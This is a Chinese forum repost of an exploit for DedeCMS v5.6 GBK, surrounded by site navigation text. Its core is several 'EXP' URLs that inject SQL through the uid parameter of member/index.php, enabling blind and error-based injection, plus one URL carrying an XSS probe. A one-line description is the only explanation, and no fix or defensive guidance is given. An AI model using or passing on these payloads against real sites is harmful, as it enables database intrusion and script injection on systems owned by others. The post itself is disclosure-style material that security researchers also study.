微信公众号添加方式：
1:搜索微信号（888888）
2:扫描左侧二维码

dedecms v5.6 GBK 注入漏洞利用(member/index.php)

发布者: 汤9760 | 发布时间: 2025-6-27 15:17| 查看数: 100| 评论数: 0|帖子模式

EXP:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
EXP:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';

htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'")/>

htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'">
来源：https://www.jb51.net/hack/38123.html
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

浏览过的版块

计算机整机

dedecms v5.6 GBK 注入漏洞利用(member/index.php)

最新评论

浏览过的版块

新人须知

常见问题

维权申诉

关注微博

扫描微信

关于合作

通讯联系